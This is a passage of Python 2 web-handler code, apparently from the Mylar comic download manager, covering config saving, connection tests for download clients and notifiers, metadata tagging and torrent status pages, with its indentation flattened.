mylar.CONFIG.TAB_USER = tab_user
mylar.CONFIG.TAB_PASS = tab_pass
mylar.CONFIG.TAB_DIRECTORY = tab_directory
readoptions = {'send2read': mylar.CONFIG.SEND2READ,
'maintainseriesfolder': mylar.CONFIG.MAINTAINSERIESFOLDER,
'tab_enable': mylar.CONFIG.TAB_ENABLE,
'tab_host': mylar.CONFIG.TAB_HOST,
'tab_user': mylar.CONFIG.TAB_USER,
'tab_pass': mylar.CONFIG.TAB_PASS,
'tab_directory': mylar.CONFIG.TAB_DIRECTORY}
mylar.CONFIG.writeconfig(values=readoptions)
raise cherrypy.HTTPRedirect("readlist")
readlistOptions.exposed = True
def arcOptions(self, StoryArcID=None, StoryArcName=None, read2filename=0, storyarcdir=0, arc_folderformat=None, copy2arcdir=0, arc_fileops='copy'):
mylar.CONFIG.READ2FILENAME = bool(int(read2filename))
mylar.CONFIG.STORYARCDIR = bool(int(storyarcdir))
if arc_folderformat is None:
mylar.CONFIG.ARC_FOLDERFORMAT = "($arc) ($spanyears)"
else:
mylar.CONFIG.ARC_FOLDERFORMAT = arc_folderformat
mylar.CONFIG.COPY2ARCDIR = bool(int(copy2arcdir))
mylar.CONFIG.ARC_FILEOPS = arc_fileops
options = {'read2filename': mylar.CONFIG.READ2FILENAME,
'storyarcdir': mylar.CONFIG.STORYARCDIR,
'arc_folderformat': mylar.CONFIG.ARC_FOLDERFORMAT,
'copy2arcdir': mylar.CONFIG.COPY2ARCDIR,
'arc_fileops': mylar.CONFIG.ARC_FILEOPS}
mylar.CONFIG.writeconfig(values=options)
#force the check/creation of directory com_location here
if mylar.CONFIG.STORYARCDIR is True:
arcdir = os.path.join(mylar.CONFIG.DESTINATION_DIR, 'StoryArcs')
if os.path.isdir(arcdir):
logger.info('Validating Directory (%s). Already exists! Continuing...' % arcdir)
else:
logger.fdebug('Storyarc Directory doesn\'t exist! Attempting to create now.')
checkdirectory = filechecker.validateAndCreateDirectory(arcdir, True)
if not checkdirectory:
logger.warn('Error trying to validate/create directory. Aborting this process at this time.')
return
if StoryArcID is not None:
raise cherrypy.HTTPRedirect("detailStoryArc?StoryArcID=%s&StoryArcName=%s" % (StoryArcID, StoryArcName))
else:
raise cherrypy.HTTPRedirect("storyarc_main")
arcOptions.exposed = True
def configUpdate(self, **kwargs):
checked_configs = ['enable_https', 'launch_browser', 'syno_fix', 'auto_update', 'annuals_on', 'api_enabled', 'nzb_startup_search',
'enforce_perms', 'sab_to_mylar', 'torrent_local', 'torrent_seedbox', 'rtorrent_ssl', 'rtorrent_verify', 'rtorrent_startonload',
'enable_torrents', 'enable_rss', 'nzbsu', 'nzbsu_verify',
'dognzb', 'dognzb_verify', 'experimental', 'enable_torrent_search', 'enable_32p', 'enable_torznab',
'newznab', 'use_minsize', 'use_maxsize', 'ddump', 'failed_download_handling', 'sab_client_post_processing', 'nzbget_client_post_processing',
'failed_auto', 'post_processing', 'enable_check_folder', 'enable_pre_scripts', 'enable_snatch_script', 'enable_extra_scripts',
'enable_meta', 'cbr2cbz_only', 'ct_tag_cr', 'ct_tag_cbl', 'ct_cbz_overwrite', 'rename_files', 'replace_spaces', 'zero_level',
'lowercase_filenames', 'autowant_upcoming', 'autowant_all', 'comic_cover_local', 'alternate_latest_series_covers', 'cvinfo', 'snatchedtorrent_notify',
'prowl_enabled', 'prowl_onsnatch', 'pushover_enabled', 'pushover_onsnatch', 'boxcar_enabled',
'boxcar_onsnatch', 'pushbullet_enabled', 'pushbullet_onsnatch', 'telegram_enabled', 'telegram_onsnatch', 'slack_enabled', 'slack_onsnatch',
'email_enabled', 'email_enc', 'email_ongrab', 'email_onpost', 'opds_enable', 'opds_authentication', 'opds_metainfo', 'opds_pagesize', 'enable_ddl', 'deluge_pause'] #enable_public
for checked_config in checked_configs:
if checked_config not in kwargs:
kwargs[checked_config] = False
for k, v in kwargs.iteritems():
try:
_conf = mylar.CONFIG._define(k)
except KeyError:
continue
mylar.CONFIG.EXTRA_NEWZNABS = []
for kwarg in [x for x in kwargs if x.startswith('newznab_name')]:
if kwarg.startswith('newznab_name'):
newznab_number = kwarg[12:]
newznab_name = kwargs['newznab_name' + newznab_number]
if newznab_name == "":
newznab_name = kwargs['newznab_host' + newznab_number]
if newznab_name == "":
continue
newznab_host = helpers.clean_url(kwargs['newznab_host' + newznab_number])
try:
newznab_verify = kwargs['newznab_verify' + newznab_number]
except:
newznab_verify = 0
newznab_api = kwargs['newznab_api' + newznab_number]
newznab_uid = kwargs['newznab_uid' + newznab_number]
try:
newznab_enabled = str(kwargs['newznab_enabled' + newznab_number])
except KeyError:
newznab_enabled = '0'
del kwargs[kwarg]
mylar.CONFIG.EXTRA_NEWZNABS.append((newznab_name, newznab_host, newznab_verify, newznab_api, newznab_uid, newznab_enabled))
mylar.CONFIG.EXTRA_TORZNABS = []
for kwarg in [x for x in kwargs if x.startswith('torznab_name')]:
if kwarg.startswith('torznab_name'):
torznab_number = kwarg[12:]
torznab_name = kwargs['torznab_name' + torznab_number]
if torznab_name == "":
torznab_name = kwargs['torznab_host' + torznab_number]
if torznab_name == "":
continue
torznab_host = helpers.clean_url(kwargs['torznab_host' + torznab_number])
try:
torznab_verify = kwargs['torznab_verify' + torznab_number]
except:
torznab_verify = 0
torznab_api = kwargs['torznab_apikey' + torznab_number]
torznab_category = kwargs['torznab_category' + torznab_number]
try:
torznab_enabled = str(kwargs['torznab_enabled' + torznab_number])
except KeyError:
torznab_enabled = '0'
del kwargs[kwarg]
mylar.CONFIG.EXTRA_TORZNABS.append((torznab_name, torznab_host, torznab_verify, torznab_api, torznab_category, torznab_enabled))
mylar.CONFIG.process_kwargs(kwargs)
#this makes sure things are set to the default values if they're not appropriately set.
mylar.CONFIG.configure(update=True, startup=False)
# Write the config
logger.info('Now saving config...')
mylar.CONFIG.writeconfig()
configUpdate.exposed = True
def SABtest(self, sabhost=None, sabusername=None, sabpassword=None, sabapikey=None):
if sabhost is None:
sabhost = mylar.CONFIG.SAB_HOST
if sabusername is None:
sabusername = mylar.CONFIG.SAB_USERNAME
if sabpassword is None:
sabpassword = mylar.CONFIG.SAB_PASSWORD
if sabapikey is None:
sabapikey = mylar.CONFIG.SAB_APIKEY
logger.fdebug('Now attempting to test SABnzbd connection')
#if user/pass given, we can auto-fill the API ;)
if sabusername is None or sabpassword is None:
logger.error('No Username / Password provided for SABnzbd credentials. Unable to test API key')
return "Invalid Username/Password provided"
logger.fdebug('testing connection to SABnzbd @ ' + sabhost)
if sabhost.endswith('/'):
sabhost = sabhost
else:
sabhost = sabhost + '/'
querysab = sabhost + 'api'
payload = {'mode': 'get_config',
'section': 'misc',
'output': 'json',
'keyword': 'api_key',
'apikey': sabapikey}
if sabhost.startswith('https'):
verify = True
else:
verify = False
version = 'Unknown'
try:
v = requests.get(querysab, params={'mode': 'version'}, verify=verify)
if str(v.status_code) == '200':
logger.fdebug('sabnzbd version: %s' % v.content)
version = v.text
r = requests.get(querysab, params=payload, verify=verify)
except Exception, e:
logger.warn('Error fetching data from %s: %s' % (querysab, e))
if requests.exceptions.SSLError:
logger.warn('Cannot verify ssl certificate. Attempting to authenticate with no ssl-certificate verification.')
try:
from requests.packages.urllib3 import disable_warnings
disable_warnings()
except:
logger.warn('Unable to disable https warnings. Expect some spam if using https nzb providers.')
verify = False
try:
v = requests.get(querysab, params={'mode': 'version'}, verify=verify)
if str(v.status_code) == '200':
logger.fdebug('sabnzbd version: %s' % v.text)
version = v.text
r = requests.get(querysab, params=payload, verify=verify)
except Exception, e:
logger.warn('Error fetching data from %s: %s' % (sabhost, e))
return 'Unable to retrieve data from SABnzbd'
else:
return 'Unable to retrieve data from SABnzbd'
logger.fdebug('status code: ' + str(r.status_code))
if str(r.status_code) != '200':
logger.warn('Unable to properly query SABnzbd @' + sabhost + ' [Status Code returned: ' + str(r.status_code) + ']')
data = False
else:
data = r.json()
try:
q_apikey = data['config']['misc']['api_key']
except:
logger.error('Error detected attempting to retrieve SAB data using FULL APIKey')
if all([sabusername is not None, sabpassword is not None]):
try:
sp = sabparse.sabnzbd(sabhost, sabusername, sabpassword)
q_apikey = sp.sab_get()
except Exception, e:
logger.warn('Error fetching data from %s: %s' % (sabhost, e))
if q_apikey is None:
return "Invalid APIKey provided"
mylar.CONFIG.SAB_APIKEY = q_apikey
logger.info('APIKey provided is the FULL APIKey which is the correct key. You still need to SAVE the config for the changes to be applied.')
logger.info('Connection to SABnzbd tested sucessfully')
mylar.CONFIG.SAB_VERSION = version
return json.dumps({"status": "Successfully verified APIkey.", "version": str(version)})
SABtest.exposed = True
def NZBGet_test(self, nzbhost=None, nzbport=None, nzbusername=None, nzbpassword=None):
if nzbhost is None:
nzbhost = mylar.CONFIG.NZBGET_HOST
if nzbport is None:
nzbport = mylar.CONFIG.NZBGET_PORT
if nzbusername is None:
nzbusername = mylar.CONFIG.NZBGET_USERNAME
if nzbpassword is None:
nzbpassword = mylar.CONFIG.NZBGET_PASSWORD
logger.fdebug('Now attempting to test NZBGet connection')
logger.info('Now testing connection to NZBGet @ %s:%s' % (nzbhost, nzbport))
if nzbhost[:5] == 'https':
protocol = 'https'
nzbgethost = nzbhost[8:]
elif nzbhost[:4] == 'http':
protocol = 'http'
nzbgethost = nzbhost[7:]
url = '%s://'
nzbparams = protocol,
if all([nzbusername is not None, nzbpassword is not None]):
url = url + '%s:%s@'
nzbparams = nzbparams + (nzbusername, nzbpassword)
elif nzbusername is not None:
url = url + '%s@'
nzbparams = nzbparams + (nzbusername,)
url = url + '%s:%s/xmlrpc'
nzbparams = nzbparams + (nzbgethost, nzbport,)
nzb_url = (url % nzbparams)
import xmlrpclib
nzbserver = xmlrpclib.ServerProxy(nzb_url)
try:
r = nzbserver.status()
except Exception as e:
logger.warn('Error fetching data: %s' % e)
return 'Unable to retrieve data from NZBGet'
logger.info('Successfully verified connection to NZBGet at %s:%s' % (nzbgethost, nzbport))
return "Successfully verified connection to NZBGet"
NZBGet_test.exposed = True
def shutdown(self):
mylar.SIGNAL = 'shutdown'
message = 'Shutting Down...'
return serve_template(templatename="shutdown.html", title="Shutting Down", message=message, timer=15)
return page
shutdown.exposed = True
def restart(self):
mylar.SIGNAL = 'restart'
message = 'Restarting...'
return serve_template(templatename="shutdown.html", title="Restarting", message=message, timer=30)
restart.exposed = True
def update(self):
mylar.SIGNAL = 'update'
message = 'Updating...<br/><small>Main screen will appear in 60s</small>'
return serve_template(templatename="shutdown.html", title="Updating", message=message, timer=30)
update.exposed = True
def getInfo(self, ComicID=None, IssueID=None):
from mylar import cache
info_dict = cache.getInfo(ComicID, IssueID)
return simplejson.dumps(info_dict)
getInfo.exposed = True
def getComicArtwork(self, ComicID=None, imageURL=None):
from mylar import cache
logger.info(u"Retrieving image for : " + comicID)
return cache.getArtwork(ComicID, imageURL)
getComicArtwork.exposed = True
def findsabAPI(self, sabhost=None, sabusername=None, sabpassword=None):
sp = sabparse.sabnzbd(sabhost, sabusername, sabpassword)
sabapi = sp.sab_get()
logger.info('SAB APIKey found as : ' + str(sabapi) + '. You still have to save the config to retain this setting.')
mylar.CONFIG.SAB_APIKEY = sabapi
return sabapi
findsabAPI.exposed = True
def generateAPI(self):
import hashlib, random
apikey = hashlib.sha224(str(random.getrandbits(256))).hexdigest()[0:32]
logger.info("New API generated")
mylar.CONFIG.API_KEY = apikey
return apikey
generateAPI.exposed = True
def api(self, *args, **kwargs):
from mylar.api import Api
a = Api()
a.checkParams(*args, **kwargs)
data = a.fetchData()
return data
api.exposed = True
def opds(self, *args, **kwargs):
from mylar.opds import OPDS
op = OPDS()
op.checkParams(*args, **kwargs)
data = op.fetchData()
return data
opds.exposed = True
def downloadthis(self, pathfile=None):
#pathfile should be escaped via the |u tag from within the html call already.
logger.fdebug('filepath to retrieve file from is : ' + pathfile)
from cherrypy.lib.static import serve_download
return serve_download(pathfile)
downloadthis.exposed = True
def IssueInfo(self, filelocation, comicname=None, issue=None, date=None, title=None):
filelocation = filelocation.encode('ASCII')
filelocation = urllib.unquote_plus(filelocation).decode('utf8')
issuedetails = helpers.IssueDetails(filelocation)
if issuedetails:
issueinfo = '<table width="500"><tr><td>'
issueinfo += '<img style="float: left; padding-right: 10px" src=' + issuedetails[0]['IssueImage'] + ' height="400" width="263">'
seriestitle = issuedetails[0]['series']
if any([seriestitle == 'None', seriestitle is None]):
seriestitle = comicname
issuenumber = issuedetails[0]['issue_number']
if any([issuenumber == 'None', issuenumber is None]):
issuenumber = issue
issuetitle = issuedetails[0]['title']
if any([issuetitle == 'None', issuetitle is None]):
issuetitle = title
issueinfo += '<h1><center><b>' + seriestitle + '</br>[#' + issuenumber + ']</b></center></h1>'
issueinfo += '<center>"' + issuetitle + '"</center></br>'
issueinfo += '</br><p class="alignleft">' + str(issuedetails[0]['pagecount']) + ' pages</p>'
if all([issuedetails[0]['day'] is None, issuedetails[0]['month'] is None, issuedetails[0]['year'] is None]):
issueinfo += '<p class="alignright">(' + str(date) + ')</p></br>'
else:
issueinfo += '<p class="alignright">(' + str(issuedetails[0]['year']) + '-' + str(issuedetails[0]['month']) + '-' + str(issuedetails[0]['day']) + ')</p></br>'
if not any([issuedetails[0]['writer'] == 'None', issuedetails[0]['writer'] is None]):
issueinfo += 'Writer: ' + issuedetails[0]['writer'] + '</br>'
if not any([issuedetails[0]['penciller'] == 'None', issuedetails[0]['penciller'] is None]):
issueinfo += 'Penciller: ' + issuedetails[0]['penciller'] + '</br>'
if not any([issuedetails[0]['inker'] == 'None', issuedetails[0]['inker'] is None]):
issueinfo += 'Inker: ' + issuedetails[0]['inker'] + '</br>'
if not any([issuedetails[0]['colorist'] == 'None', issuedetails[0]['colorist'] is None]):
issueinfo += 'Colorist: ' + issuedetails[0]['colorist'] + '</br>'
if not any([issuedetails[0]['letterer'] == 'None', issuedetails[0]['letterer'] is None]):
issueinfo += 'Letterer: ' + issuedetails[0]['letterer'] + '</br>'
if not any([issuedetails[0]['editor'] == 'None', issuedetails[0]['editor'] is None]):
issueinfo += 'Editor: ' + issuedetails[0]['editor'] + '</br>'
issueinfo += '</td></tr>'
#issueinfo += '<img src="interfaces/default/images/rename.png" height="25" width="25"></td></tr>'
issuesumm = None
if all([issuedetails[0]['summary'] == 'None', issuedetails[0]['summary'] is None]):
issuesumm = 'No summary available within metatagging.'
else:
if len(issuedetails[0]['summary']) > 1000:
issuesumm = issuedetails[0]['summary'][:1000] + '...'
else:
issuesumm = issuedetails[0]['summary']
issueinfo += '<tr><td>Summary: ' + issuesumm + '</br></td></tr>'
issueinfo += '<tr><td><center>' + os.path.split(filelocation)[1] + '</center>'
issueinfo += '</td></tr></table>'
else:
ErrorPNG = 'interfaces/default/images/symbol_exclamation.png'
issueinfo = '<table width="300"><tr><td>'
issueinfo += '<img style="float: left; padding-right: 10px" src=' + ErrorPNG + ' height="128" width="128">'
issueinfo += '<h1><center><b>ERROR</b></center></h1></br>'
issueinfo += '<center>Unable to retrieve metadata from within cbz file</center></br>'
issueinfo += '<center>Maybe you should try and tag the file again?</center></br>'
issueinfo += '<tr><td><center>' + os.path.split(filelocation)[1] + '</center>'
issueinfo += '</td></tr></table>'
return issueinfo
IssueInfo.exposed = True
def manual_metatag(self, dirName, issueid, filename, comicid, comversion, seriesyear=None, group=False):
module = '[MANUAL META-TAGGING]'
try:
import cmtagmylar
if mylar.CONFIG.CMTAG_START_YEAR_AS_VOLUME:
if all([seriesyear is not None, seriesyear != 'None']):
vol_label = seriesyear
else:
logger.warn('Cannot populate the year for the series for some reason. Dropping down to numeric volume label.')
vol_label = comversion
else:
vol_label = comversion
metaresponse = cmtagmylar.run(dirName, issueid=issueid, filename=filename, comversion=vol_label, manualmeta=True)
except ImportError:
logger.warn(module + ' comictaggerlib not found on system. Ensure the ENTIRE lib directory is located within mylar/lib/comictaggerlib/ directory.')
metaresponse = "fail"
if metaresponse == "fail":
logger.fdebug(module + ' Unable to write metadata successfully - check mylar.log file.')
return
elif metaresponse == "unrar error":
logger.error(module + ' This is a corrupt archive - whether CRC errors or it is incomplete. Marking as BAD, and retrying a different copy.')
return
#launch failed download handling here.
else:
dst = os.path.join(dirName, os.path.split(metaresponse)[1])
fail = False
try:
shutil.copy(metaresponse, dst)
logger.info('%s Sucessfully wrote metadata to .cbz (%s) - Continuing..' % (module, os.path.split(metaresponse)[1]))
except Exception as e:
if str(e.errno) == '2':
try:
if mylar.CONFIG.MULTIPLE_DEST_DIRS is not None and mylar.CONFIG.MULTIPLE_DEST_DIRS != 'None' and os.path.join(mylar.CONFIG.MULTIPLE_DEST_DIRS, os.path.basename(dirName)) != dirName:
dst = os.path.join(mylar.CONFIG.MULTIPLE_DEST_DIRS, os.path.basename(dirName))
shutil.copy(metaresponse, dst)
logger.info('%s Sucessfully wrote metadata to .cbz (%s) - Continuing..' % (module, os.path.split(metaresponse)[1]))
except Exception as e:
logger.warn('%s [%s] Unable to complete metatagging : %s [%s]' % (module, dst, e, e.errno))
fail = True
else:
logger.warn('%s [%s] Unable to complete metatagging : %s [%s]' % (module, dst, e, e.errno))
fail = True
cache_dir = os.path.split(metaresponse)[0]
if os.path.isfile(metaresponse):
try:
os.remove(metaresponse)
except OSError:
pass
if not os.listdir(cache_dir):
logger.fdebug('%s Tidying up. Deleting temporary cache directory: %s' % (module, cache_dir))
try:
shutil.rmtree(cache_dir)
except Exception as e:
logger.warn(module + ' Unable to remove temporary directory: %s' % cache_dir)
else:
logger.fdebug('Failed to remove temporary directory: %s' % cache_dir)
if filename is not None:
if os.path.isfile(filename) and os.path.split(filename)[1].lower() != os.path.split(metaresponse)[1].lower():
try:
logger.fdebug('%s Removing original filename: %s' % (module, filename))
os.remove(filename)
except OSError:
pass
if any([group is False, fail is False]):
updater.forceRescan(comicid)
manual_metatag.exposed = True
def group_metatag(self, ComicID, dirName=None):
myDB = db.DBConnection()
cinfo = myDB.selectone('SELECT ComicLocation, ComicVersion, ComicYear, ComicName FROM comics WHERE ComicID=?', [ComicID]).fetchone()
groupinfo = myDB.select('SELECT * FROM issues WHERE ComicID=? and Location is not NULL', [ComicID])
if groupinfo is None:
logger.warn('No issues physically exist within the series directory for me to (re)-tag.')
return
if dirName is None:
meta_dir = cinfo['ComicLocation']
else:
meta_dir = dirName
for ginfo in groupinfo:
#if multiple_dest_dirs is in effect, metadir will be pointing to the wrong location and cause a 'Unable to create temporary cache location' error message
self.manual_metatag(meta_dir, ginfo['IssueID'], os.path.join(meta_dir, ginfo['Location']), ComicID, comversion=cinfo['ComicVersion'], seriesyear=cinfo['ComicYear'], group=True)
updater.forceRescan(ComicID)
logger.info('[SERIES-METATAGGER][' + cinfo['ComicName'] + ' (' + cinfo['ComicYear'] + ')] Finished doing a complete series (re)tagging of metadata.')
group_metatag.exposed = True
def CreateFolders(self, createfolders=None):
if createfolders:
mylar.CONFIG.CREATE_FOLDERS = int(createfolders)
#mylar.config_write()
CreateFolders.exposed = True
def getPushbulletDevices(self, api=None):
notifythis = notifiers.pushbullet
result = notifythis.get_devices(api)
if result:
return result
else:
return 'Error sending Pushbullet notifications.'
getPushbulletDevices.exposed = True
def syncfiles(self):
#3 status' exist for the readlist.
# Added (Not Read) - Issue is added to the readlist and is awaiting to be 'sent' to your reading client.
# Read - Issue has been read
# Not Read - Issue has been downloaded to your reading client after the syncfiles has taken place.
read = readinglist.Readinglist()
threading.Thread(target=read.syncreading).start()
syncfiles.exposed = True
def search_32p(self, search=None):
return mylar.rsscheck.torrents(pickfeed='4', seriesname=search)
search_32p.exposed = True
def testprowl(self):
prowl = notifiers.prowl()
result = prowl.test_notify()
if result:
return "Successfully sent Prowl test - check to make sure it worked"
else:
return "Error sending test message to Prowl"
testprowl.exposed = True
def testboxcar(self):
boxcar = notifiers.boxcar()
result = boxcar.test_notify()
if result:
return "Successfully sent Boxcar test - check to make sure it worked"
else:
return "Error sending test message to Boxcar"
testboxcar.exposed = True
def testpushover(self, apikey, userkey, device):
pushover = notifiers.PUSHOVER(test_apikey=apikey, test_userkey=userkey, test_device=device)
result = pushover.test_notify()
if result == True:
return "Successfully sent PushOver test - check to make sure it worked"
else:
logger.warn('Last six characters of the test variables used [APIKEY: %s][USERKEY: %s]' % (apikey[-6:], userkey[-6:]))
return "Error sending test message to Pushover"
testpushover.exposed = True
def testpushbullet(self, apikey):
pushbullet = notifiers.PUSHBULLET(test_apikey=apikey)
result = pushbullet.test_notify()
if result['status'] == True:
return result['message']
else:
logger.warn('APIKEY used for test was : %s' % apikey)
return result['message']
testpushbullet.exposed = True
def testtelegram(self, userid, token):
telegram = notifiers.TELEGRAM(test_userid=userid, test_token=token)
result = telegram.test_notify()
if result == True:
return "Successfully sent Telegram test - check to make sure it worked"
else:
logger.warn('Test variables used [USERID: %s][TOKEN: %s]' % (userid, token))
return "Error sending test message to Telegram"
testtelegram.exposed = True
def testslack(self, webhook_url):
slack = notifiers.SLACK(test_webhook_url=webhook_url)
result = slack.test_notify()
if result == True:
return "Successfully sent Slack test - check to make sure it worked"
else:
logger.warn('Test variables used [WEBHOOK_URL: %s][USERNAME: %s]' % (webhook_url, username))
return "Error sending test message to Slack"
testslack.exposed = True
def testemail(self, emailfrom, emailto, emailsvr, emailport, emailuser, emailpass, emailenc):
email = notifiers.EMAIL(test_emailfrom=emailfrom, test_emailto=emailto, test_emailsvr=emailsvr, test_emailport=emailport, test_emailuser=emailuser, test_emailpass=emailpass, test_emailenc=emailenc)
result = email.test_notify()
if result == True:
return "Successfully sent email. Check your mailbox."
else:
logger.warn('Email test has gone horribly wrong. Variables used were [FROM: %s] [TO: %s] [SERVER: %s] [PORT: %s] [USER: %s] [PASSWORD: ********] [ENCRYPTION: %s]' % (emailfrom, emailto, emailsvr, emailport, emailuser, emailenc))
return "Error sending test message via email"
testemail.exposed = True
def testrtorrent(self, host, username, password, auth, verify, rpc_url):
import torrent.clients.rtorrent as TorClient
client = TorClient.TorrentClient()
ca_bundle = None
if mylar.CONFIG.RTORRENT_CA_BUNDLE is not None:
ca_bundle = mylar.CONFIG.RTORRENT_CA_BUNDLE
rclient = client.connect(host, username, password, auth, verify, rpc_url, ca_bundle, test=True)
if not rclient:
logger.warn('Could not establish connection to %s' % host)
return '[rTorrent] Error establishing connection to Rtorrent'
else:
if rclient['status'] is False:
logger.warn('[rTorrent] Could not establish connection to %s. Error returned: %s' % (host, rclient['error']))
return 'Error establishing connection to rTorrent'
else:
logger.info('[rTorrent] Successfully validated connection to %s [v%s]' % (host, rclient['version']))
return 'Successfully validated rTorrent connection'
testrtorrent.exposed = True
def testqbit(self, host, username, password):
import torrent.clients.qbittorrent as QbitClient
qc = QbitClient.TorrentClient()
qclient = qc.connect(host, username, password, True)
if not qclient:
logger.warn('[qBittorrent] Could not establish connection to %s' % host)
return 'Error establishing connection to Qbittorrent'
else:
if qclient['status'] is False:
logger.warn('[qBittorrent] Could not establish connection to %s. Error returned: %s' % (host, qclient['error']))
return 'Error establishing connection to Qbittorrent'
else:
logger.info('[qBittorrent] Successfully validated connection to %s [v%s]' % (host, qclient['version']))
return 'Successfully validated qBittorrent connection'
testqbit.exposed = True
def testdeluge(self, host, username, password):
import torrent.clients.deluge as DelugeClient
client = DelugeClient.TorrentClient()
dclient = client.connect(host, username, password, True)
if not dclient:
logger.warn('[Deluge] Could not establish connection to %s' % host)
return 'Error establishing connection to Deluge'
else:
if dclient['status'] is False:
logger.warn('[Deluge] Could not establish connection to %s. Error returned: %s' % (host, dclient['error']))
return 'Error establishing connection to Deluge'
else:
logger.info('[Deluge] Successfully validated connection to %s [daemon v%s; libtorrent v%s]' % (host, dclient['daemon_version'], dclient['libtorrent_version']))
return 'Successfully validated Deluge connection'
testdeluge.exposed = True
def testnewznab(self, name, host, ssl, apikey):
logger.fdebug('ssl/verify: %s' % ssl)
if 'ssl' == '0' or ssl == '1':
ssl = bool(int(ssl))
else:
if ssl == 'false':
ssl = False
else:
ssl = True
result = helpers.newznab_test(name, host, ssl, apikey)
if result is True:
logger.info('Successfully tested %s [%s] - valid api response received' % (name, host))
return 'Successfully tested %s!' % name
else:
logger.warn('Testing failed to %s [HOST:%s][SSL:%s]' % (name, host, bool(ssl)))
return 'Error - failed running test for %s' % name
testnewznab.exposed = True
def testtorznab(self, name, host, ssl, apikey):
logger.fdebug('ssl/verify: %s' % ssl)
if 'ssl' == '0' or ssl == '1':
ssl = bool(int(ssl))
else:
if ssl == 'false':
ssl = False
else:
ssl = True
result = helpers.torznab_test(name, host, ssl, apikey)
if result is True:
logger.info('Successfully tested %s [%s] - valid api response received' % (name, host))
return 'Successfully tested %s!' % name
else:
print result
logger.warn('Testing failed to %s [HOST:%s][SSL:%s]' % (name, host, bool(ssl)))
return 'Error - failed running test for %s' % name
testtorznab.exposed = True
def orderThis(self, **kwargs):
return
orderThis.exposed = True
def torrentit(self, issueid=None, torrent_hash=None, download=False):
#make sure it's bool'd here.
if download == 'True':
download = True
else:
download = False
if mylar.CONFIG.AUTO_SNATCH is False:
logger.warn('Auto-Snatch is not enabled - this will ONLY work with auto-snatch enabled and configured. Aborting request.')
return 'Unable to complete request - please enable auto-snatch if required'
torrent_info = helpers.torrentinfo(issueid, torrent_hash, download)
if torrent_info:
torrent_name = torrent_info['name']
torrent_info['filesize'] = helpers.human_size(torrent_info['total_filesize'])
torrent_info['download'] = helpers.human_size(torrent_info['download_total'])
torrent_info['upload'] = helpers.human_size(torrent_info['upload_total'])
torrent_info['seedtime'] = helpers.humanize_time(amount=int(time.time()) - torrent_info['time_started'])
logger.info("Client: %s", mylar.CONFIG.RTORRENT_HOST)
logger.info("Directory: %s", torrent_info['folder'])
logger.info("Name: %s", torrent_info['name'])
logger.info("Hash: %s", torrent_info['hash'])
logger.info("FileSize: %s", torrent_info['filesize'])
logger.info("Completed: %s", torrent_info['completed'])
logger.info("Downloaded: %s", torrent_info['download'])
logger.info("Uploaded: %s", torrent_info['upload'])
logger.info("Ratio: %s", torrent_info['ratio'])
logger.info("Seeding Time: %s", torrent_info['seedtime'])
if torrent_info['label']:
logger.info("Torrent Label: %s", torrent_info['label'])
ti = '<table><tr><td>'
ti += '<center><b>' + torrent_name + '</b></center></br>'
if torrent_info['completed'] and download is True:
ti += '<br><center><tr><td>AUTO-SNATCH ENABLED: ' + torrent_info['snatch_status'] + '</center></td></tr>'
ti += '<tr><td><center>Hash: ' + torrent_info['hash'] + '</center></td></tr>'
ti += '<tr><td><center>Location: ' + os.path.join(torrent_info['folder'], torrent_name) + '</center></td></tr></br>'
ti += '<tr><td><center>Filesize: ' + torrent_info['filesize'] + '</center></td></tr>'
ti += '<tr><td><center>' + torrent_info['download'] + ' DOWN / ' + torrent_info['upload'] + ' UP</center></td></tr>'
ti += '<tr><td><center>Ratio: ' + str(torrent_info['ratio']) + '</center></td></tr>'
ti += '<tr><td><center>Seedtime: ' + torrent_info['seedtime'] + '</center></td</tr>'
ti += '</table>'
logger.info('torrent_info:%s' % torrent_info)
#commenting out the next 2 lines will return the torrent information to the screen
#fp = mylar.process.Process(torrent_info['filepath'], torrent_info['dst_folder'], issueid=torrent_info['issueid'], failed=failed)
#fp.post_process()
else:
torrent_name = 'Not Found'
ti = 'Torrent not found (' + str(torrent_hash)
return ti
torrentit.exposed = True
def get_the_hash(self, filepath):
import hashlib, StringIO
import rtorrent.lib.bencode as bencode
# Open torrent file
torrent_file = open(os.path.join('/home/hero/mylar/cache', filepath), "rb")
metainfo = bencode.decode(torrent_file.read())
info = metainfo['info']
thehash = hashlib.sha1(bencode.encode(info)).hexdigest().upper()
logger.info('Hash: ' + thehash)
get_the_hash.exposed = True
def download_0day(self, week):
logger.info('Now attempting to search for 0-day pack for week: %s' % week)
#week contains weekinfo['midweek'] = YYYY-mm-dd of Wednesday of the given week's pull
foundcom, prov = search.search_init('0-Day Comics Pack - %s.%s' % (week[:4],week[5:]), None, week[:4], None, None, week, week, None, allow_packs=True, oneoff=True)
download_0day.exposed = True
def test_32p(self, username, password):
import auth32p
tmp = auth32p.info32p(test={'username': username, 'password': password})
rtnvalues = tmp.authenticate()
if rtnvalues['status'] is True:
return json.dumps({"status": "Successfully Authenticated.", "inkdrops": mylar.INKDROPS_32P})
else:
return json.dumps({"status": "Could not Authenticate.", "inkdrops": mylar.INKDROPS_32P})
test_32p.exposed = True
def check_ActiveDDL(self):
myDB = db.DBConnection()
active = myDB.selectone("SELECT * FROM DDL_INFO WHERE STATUS = 'Downloading'").fetchone()
if active is None:
return json.dumps({'status': 'There are no active downloads currently being attended to',
'percent': 0,
'a_series': None,
'a_year': None,
'a_filename': None,
'a_size': None,
'a_id': None})
else:
filelocation = os.path.join(mylar.CONFIG.DDL_LOCATION, active['filename'])
#logger.fdebug('checking file existance: %s' % filelocation)
if os.path.exists(filelocation) is True:
filesize = os.stat(filelocation).st_size
cmath = int(float(filesize*100)/int(int(active['remote_filesize'])*100) * 100)
#logger.fdebug('ACTIVE DDL: %s %s [%s]' % (active['filename'], cmath, 'Downloading'))
return json.dumps({'status': 'Downloading',
'percent': "%s%s" % (cmath, '%'),
'a_series': active['series'],
'a_year': active['year'],
'a_filename': active['filename'],
'a_size': active['size'],
'a_id': active['id']})
else:
# myDB.upsert('ddl_info', {'status': 'Incomplete'}, {'id': active['id']})
return json.dumps({'a_id': active['id'], 'status': 'File does not exist in %s.</br> This probably needs to be restarted (use the option in the GUI)' % filelocation, 'percent': 0})
check_ActiveDDL.exposed = True
def create_readlist(self, list=None, weeknumber=None, year=None):
# ({
# "PUBLISHER": weekly['PUBLISHER'],
# "ISSUE": weekly['ISSUE'],
# "COMIC": weekly['COMIC'],
# "STATUS": tmp_status,
# "COMICID": weekly['ComicID'],
# "ISSUEID": weekly['IssueID'],
# "HAVEIT": haveit,
# "LINK": linkit,
# "AUTOWANT": False
# })
issuelist = []
